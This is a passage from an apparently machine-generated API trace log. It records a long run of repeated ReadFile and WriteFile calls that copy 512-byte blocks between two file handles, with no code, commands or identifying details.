nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.122] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.123] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.124] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.124] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.125] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.126] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.126] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.127] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.127] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.128] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.128] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.129] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.129] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.130] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.130] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.131] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.131] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.132] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.132] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.133] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.133] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.134] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.134] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.135] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.135] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.136] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.136] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.137] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.137] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.138] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.138] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.139] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.139] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.140] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.140] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.141] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.141] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.142] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.142] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.143] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.143] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.144] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.144] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.145] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.145] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.146] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.146] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.147] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.147] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.148] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.148] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.149] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.150] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.150] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.151] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.151] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.152] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.153] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.153] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.155] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.156] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.156] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.158] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.161] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.161] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.162] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.162] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.163] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.163] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.164] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.164] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.165] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.165] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.166] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.166] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.167] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.168] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.169] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.170] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.170] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, 